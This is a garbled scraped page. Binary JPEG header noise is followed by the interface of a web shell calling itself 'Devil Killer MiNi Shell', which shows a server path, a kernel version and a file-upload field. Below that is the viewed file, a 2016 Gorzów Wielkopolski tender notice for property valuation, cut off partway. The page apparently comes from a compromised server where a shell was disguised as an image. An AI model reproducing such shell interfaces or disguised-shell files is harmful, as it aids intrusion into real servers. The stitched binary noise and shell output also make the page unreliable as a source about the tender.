JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160119/6541-N-2016.html

<p class="kh_header"><b>Gorzów Wielkopolski: Wycena nieruchomości stanowiących własność Miasta Gorzowa Wlkp., Skarbu Państwa oraz nieruchomości będących we władaniu osób fizycznych lub prawnych, a będących przedmiotem obrotu z Miastem lub Skarbem Państwa</b><br>
<b>Numer ogłoszenia: 6541 - 2016; data zamieszczenia: 19.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wrota.lubuskie.pl/umgorzow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycena nieruchomości stanowiących własność Miasta Gorzowa Wlkp., Skarbu Państwa oraz nieruchomości będących we władaniu osób fizycznych lub prawnych, a będących przedmiotem obrotu z Miastem lub Skarbem Państwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest na obsługa Wydziału Gospodarki Nieruchomościami w 2016r.  w zakresie wyceny nieruchomości stanowiących własność Miasta Gorzowa Wlkp., Skarbu Państwa oraz nieruchomości będących we władaniu osób fizycznych lub prawnych, a będących przedmiotem obrotu z Miastem lub Skarbem Państwa.
Przedmiot zamówienia obejmuje 6 Zamówień Częściowych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zgodnie z art. 67 ust. 1 pkt 6 stawy Pzp. Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, w tym zakresie, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej jedną usługę/ operat szacunkowy polegającą na: a. wycenie gruntów, jako przedmiotu prawa własności do celów aktualizacji opłat rocznych z tytułu użytkowania wieczystego i trwałego za?rządu nieruchomościami, (dla zamówienia częściowego nr 1), b. wycenie gruntów niezabudowanych wraz z częściami składowymi do celów sprzedaży, nabycia, zamiany, wniesienia aportem oraz oddania gruntu w użytkowanie wieczyste wraz z prawami i obciążeniami, w tym służebnościami zapewniającymi dostęp nieruchomości do drogi publicznej lub sieci, a ponadto do celów sprzedaży na własność prawa użytkowania wieczystego, ustalenia odszkodowania i ustanowienia służebności (dla zamówienia częściowego nr 2), c. wycenie nieruchomości do celów ustalenia opłat planistycznych i opłat adiacenckich (dla zadania częściowego nr 3), d. wycenie nieruchomości zabudowanych garażami z określeniem wartości nieruchomości oraz powierzchni użytkowej garażu, w tym wartości gruntu i wartości garażu wraz z prawami, w tym służebnościami i udziałami w gruncie stanowiącym drogi dojazdowe zapewniającymi dostęp nieruchomości do drogi publicznej - do celów zbycia lub nabycia nieruchomości, (dla zadania częściowego nr 4), e. wycenie lokali mieszkalnych w tym domów mieszkalnych jednorodzinnych oraz gruntu, na którym posadowiony jest budynek wraz z prawami, w tym służebnościami zapewniającymi dostęp nieruchomości do drogi publicznej - do celów sprzedaży, (dla zadania częściowego nr 5), f. wyceny nieruchomości gruntowych z określeniem wartości prawa własności i prawa użytkowania wieczystego - do celów ustalania opłaty za przekształcenie prawa użytkowa?nia wieczystego w prawo własności,  (dla zadania częściowego nr 6),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, w tym zakresie, jeżeli Wykonawca wykaże, że dysponuje na okres realizacji zamówienia osobami zdolnymi do wykonania zamówienia, posiadającymi niezbędne kwalifikacje tj.:- minimum jedna osobą posiadającą uprawnienia w zakresie wyceny nieruchomości</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Upoważnienie dla osoby reprezentującej Wykonawcę, o ile nie wynika to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku Wykonawców; Pisemne zobowiązanie do współpracy osób lub podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - załączyć w przypadku polegania na osobach innych podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - LICZBA LAT - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty i określa warunki takiej zmiany tj. 
1) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
2) konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany są korzystne dla Zamawiającego.
3) zmiany ilości działek przeznaczonych do wyceny, które wynikać będą z faktycznego, bieżącego zapotrzebowania Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wrota.lubuskie.pl/umgorzow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp. ul. Sikorskiego 3-4, 66-400 Gorzów Wlkp. Referat Zamówień Publicznych II pietro pok. 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2016 godzina 10:00, miejsce: Urząd Miasta Gorzowa Wlkp. ul. Sikorskiego 3-4, 66-400 Gorzów Wlkp. Kancelaria ogólna- parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wycena gruntów, jako przedmiotu prawa własności do celów aktualizacji opłat rocznych z tytułu użytkowania wieczystego i trwałego zarządu nieruchomościami..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres wyceny - grunt.
W ramach tej części zamówienia planuje się zlecić wycenę 335 działek.
Zamawiający zastrzega, że wyżej wymieniona ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek przeznaczonych do wyceny, gdyż ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
W ofercie należy podać cenę brutto usługi obejmującej wycenę jednej działki gruntu.
Do wykonania usługi Zamawiający dostarczy wypis z ewidencji gruntów oraz mapę poglądową. 
Operaty z szacowania nieruchomości winny być wykonane zgodnie z przepisami prawa obowiązującymi w tym zakresie.
Wyceny należy wykonać w formie operatu szacunkowego w dwóch egzemplarzach, każdy z dokumentacją fotograficzną wykonaną podczas wizji w terenie.
W ramach usługi wykonawca zobowiązany będzie na jednorazowe wezwanie zamawiającego do określenia wartości prawa użytkowania wieczystego - zgodnie z §29 ust. 3 rozporządzenia z dnia 21.09.2004r. Rady Ministrów w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego- w terminie 14 dni od dnia doręczenia wezwania.
W ramach usługi wykonawca przez ilość lat wskazanych w ofercie będzie zobowiązany na jednorazowe wezwanie zamawiającego przeprowadzić aktualizację wartości nieruchomości przy czym przez aktualizację wartości nieruchomości należy rozumieć potwierdzenie aktualności lub wykonanie ponownej wyceny.
Terminy wykonywania usługi przy zamówieniach obejmujących jednorazowo wycenę: od 1 do 20 działki - 2 tygodnie, od 20 do 40 działek - 3 tygodnie, powyżej 40 działek - 4 tygodnie,
licząc od dnia dostarczenia Wykonawcy zapotrzebowania.
Odbiór materiałów od zleceniodawcy nastąpi w przeciągu 6 godzin od otrzymania informacji o ich gotowości. Zapotrzebowanie na usługę składane będzie telefoniczne lub e-mailem bądź faxem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. LICZBA LAT - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wycena gruntów niezabudowanych wraz z częściami składowymi do celów sprzedaży, nabycia, zamiany, wniesienia aportem oraz oddania gruntu w użytkowanie wieczyste wraz z prawami i obciążeniami, w tym służebnościami zapewniającymi dostęp nieruchomości do drogi publicznej lub sieci, a ponadto do celów sprzedaży na własność nieruchomości gruntowej oddanej w użytkowanie wieczyste, ustalenia odszkodowania i ustanowienia służebności..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres wyceny - grunt.
W ramach tej części zamówienia planuje się zlecić wycenę 180 działek.
Zamawiający zastrzega, że wyżej wymieniona ilość działek jest wielkością szacunkową i nie sta?nowi ona ani maksymalnej, ani minimalnej ilości działek przeznaczonych do wyceny, gdyż ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
W ofercie należy podać cenę brutto usługi obejmującej wycenę jednej działki gruntu.
Do wykonania usługi Zamawiający dostarczy opis i mapę nieruchomości.
Operaty z szacowania nieruchomości winny być wykonane zgodnie z przepisami prawa obowiązującymi w tym zakresie.
Wyceny należy wykonać w formie operatu szacunkowego w dwóch egzemplarzach, każdy z dokumentacją fotograficzną wykonaną podczas wizji w terenie.
Terminy wykonywania usługi przy zamówieniach obejmujących jednorazowo wycenę:
od 1 do 5 działek - 6 dni
od 6 do 12 działek - 12 dni
od 13 do 20 działek - 18 dni
licząc od dnia dostarczenia Wykonawcy zapotrzebowania.
Zamawiający zastrzega sobie prawo do zlecenia jednorazowej usługi bez konieczności prze?strze?gania terminów zawartych w umowie zlecenie - nie częściej niż raz na miesiąc.
W ramach usługi wykonawca przez ilość lat wskazanych w ofercie będzie zobowiązany na jednorazowe wezwanie zamawiającego przeprowa?dzić aktualizację wartości nieruchomości przy czym przez aktualizację wartości nieruchomości należy rozumieć potwierdzenie aktualności lub wykonanie ponownej wyceny.
Odbiór materiałów od zleceniodawcy nastąpi w przeciągu 6 godzin od otrzymania informacji o ich gotowości. Zapotrzebowanie na usługę składane będzie telefoniczne lub e-mailem bądź faxem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. LICZBA LAT - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wycena  nieruchomości gruntowych do celów ustalenia opłat planistycznych i opłat adiacenckich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres wyceny - grunt.
W ramach tej części zamówienia planuje się zle?cić wycenę 20 nieruchomości.
Zamawiający zastrzega, że wyżej wymieniona ilość nieruchomości jest wielkością szacunkową 
i nie stanowi ona ani maksymalnej, ani minimalnej ilości nieruchomości przeznaczonych do wyceny, gdyż ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
W ofercie należy podać cenę brutto usługi obejmującej wycenę jednej nieruchomości.
Do wykonania usługi Zamawiający dostarczy wypis z ewidencji gruntów i mapę poglądową.
Operaty z szacowania nieruchomości winny być wykonane zgodnie z przepisami prawa obowiązującymi w tym zakresie.
Wyceny należy wykonać w formie operatu szacunkowego w dwóch egzemplarzach, każdy z dokumentacją fotograficzną wykonaną podczas wizji w terenie.
Termin wykonywania usługi przy zamówieniach obejmujących jednorazowo wycenę:
od 1 do 5 nieruchomości - 2 tygodnie, licząc od dnia dostarczenia Wykonawcy zapotrzebowania.
W ramach usługi wykonawca przez ilość lat wskazanych w ofercie będzie zobowiązany na jednorazowe wezwanie zamawiającego przeprowadzić aktualizację wartości nieruchomości przy czym przez aktualizację wartości nieruchomości należy rozumieć potwierdzenie aktualności lub wykonanie ponownej wyceny.
Odbiór materiałów od zleceniodawcy nastąpi w przeciągu 6 godzin od otrzymania informacji o ich gotowości. Zapotrzebowanie na usługę składane będzie telefoniczne lub e-mailem bądź faxem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. LICZBA LAT - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wycena nieruchomości zabudowanych garażami z określeniem wartości nieruchomości oraz powierzchni użytkowej garażu, w tym wartości gruntu i wartości garażu wraz z prawami, w tym służebnościami i udziałami w gruncie stanowiącym drogi dojazdowe zapewniającymi dostęp nieruchomości do drogi publicznej - do celów zbycia lub nabycia nieruchomości..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres wyceny - grunt i budynek.
W ramach tej części zamówienia planuje się zlecić wycenę 33 nieruchomości.
Zamawiający zastrzega, że wyżej wymieniona ilość nieruchomości jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości nieruchomości przeznaczonych do wyceny, gdyż ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
W ofercie należy podać cenę brutto usługi obejmującej wycenę jednej nieruchomości zabudowanej garażem.
Do wykonania usługi Zamawiający dostarczy opis i mapę nieruchomości.
Operaty z szacowania nieruchomości winny być wykonane zgodnie z przepisami prawa obowiązującymi w tym zakresie, a ponadto zawierać rzut garażu wykonany na podstawie pomiarów z natury, z podaniem pomiarów liniowych.
Wyceny należy wykonać w formie operatu szacunkowego w dwóch egzemplarzach, każdy z dokumentacją fotograficzną wykonaną podczas wizji w terenie.
Terminy wykonywania usługi przy zamówieniach obejmujących jednorazowo wycenę: od 1 do 5 nieruchomości - 10 dni; od 6 do 12 nieruchomości - 20 dni
licząc od dnia dostarczenia Wykonawcy opisu i mapy. 
W ramach usługi wykonawca przez ilość lat wskazanych w ofercie będzie zobowiązany na jednorazowe wezwanie zamawiającego przeprowadzić aktualizację wartości nieruchomości przy czym przez aktualizację wartości nieruchomości należy rozumieć potwierdzenie aktualności lub wykonanie ponownej wyceny. Odbiór materiałów od zleceniodawcy nastąpi w przeciągu 6 godzin od otrzymania informacji 
o ich gotowości. Zapotrzebowanie na usługę składane będzie telefoniczne lub e-mailem bądź faxem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. LICZBA LAT - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wycena lokali mieszkalnych w tym domów mieszkalnych jednorodzinnych oraz gruntu, na którym posadowiony jest budynek wraz z prawami, w tym służebnościami zapewniającymi dostęp nieruchomości do drogi publicznej - do celów sprzedaży..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach tej części zamówienia planuje się zle?cić wycenę 110 lokali.
Zamawiający zastrzega, że wyżej wymieniona ilość lokali jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości lokali przeznaczonych do wyceny, gdyż ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
W ofercie należy podać cenę brutto usługi obejmującej wycenę jednego lokalu.
Do wykonania usługi Zamawiający dostarczy opis i mapę nieruchomości.
Operaty z szacowania nieruchomości winny być wykonane zgodnie z przepisami prawa obowiązującymi w tym zakresie, a po?nadto zawierać: rzuty lokali wykonane na podstawie pomiarów z natury z podaniem wymiarów liniowych, rzuty kondygnacji budynku z zaznaczeniem położenia lokali i pomieszczeń do nich przynależnych, a w razie położenia pomieszczeń przynależnych poza budynkiem mieszkalnym - także na wyrysie operatu ewidencyjnego z zaznaczeniem tych pomieszczeń. W przypadku braku inwentaryzacji rzuty winny być sporządzone zgodnie z wymogami przepisów Prawa budowlanego. W ramach usługi wykonawca przez ilość lat wskazanych w ofercie będzie zobowiązany na jednorazowe wezwanie zamawiającego przeprowadzić aktualizację wartości nieruchomości przy czym przez aktualizację wartości nieruchomości należy rozumieć potwierdzenie aktualności lub wykonanie ponownej wyceny.
